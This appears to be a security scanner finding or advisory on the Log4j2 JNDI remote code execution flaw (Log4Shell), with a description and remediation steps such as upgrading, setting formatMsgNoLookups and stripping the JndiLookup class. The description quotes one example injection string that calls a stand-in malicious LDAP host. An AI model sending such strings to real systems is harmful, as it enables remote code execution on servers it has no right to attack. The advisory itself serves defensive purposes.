Apache Log4j2 JNDI Remote Code Execution (404 page handler)
Description
Apache Log4j2 versions 2.0 through 2.14.1 contain a critical remote code execution vulnerability in their JNDI (Java Naming and Directory Interface) lookup feature. This widely-used Java logging library processes special syntax in log messages that can trigger lookups to external resources. When an attacker-controlled string containing a JNDI lookup expression (such as ${jndi:ldap://malicious-server/payload}) is logged by the application, Log4j2 will attempt to resolve it, potentially loading and executing arbitrary code from attacker-controlled LDAP or other JNDI servers. This vulnerability is particularly dangerous because user-supplied data is commonly logged in web applications, making exploitation straightforward in many scenarios.
Remediation
Take immediate action to remediate this critical vulnerability using one of the following approaches, listed in order of preference:
1. Upgrade Log4j2 (Recommended): Update to Log4j2 version 2.17.1 or later (2.12.4 for Java 7, 2.3.2 for Java 6). This completely removes the vulnerable functionality.
2. Apply Mitigation for Versions 2.10 and Above: If immediate upgrading is not possible, set the system property log4j2.formatMsgNoLookups to true by adding the following JVM argument:
-Dlog4j2.formatMsgNoLookups=true
3. Remove the Vulnerable Class: For versions 2.0 through 2.14.1, remove the JndiLookup class from the Log4j2 core JAR file:
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
4. Java Version Upgrade: Ensure you are running Java 8u121 or later, which defaults com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase to false. Note that this only provides partial protection against RCE via RMI and does not protect against LDAP-based attacks.
After applying fixes, verify the remediation by testing with known proof-of-concept payloads in a safe environment and scan your environment to identify all instances of Log4j2 in use, including transitive dependencies.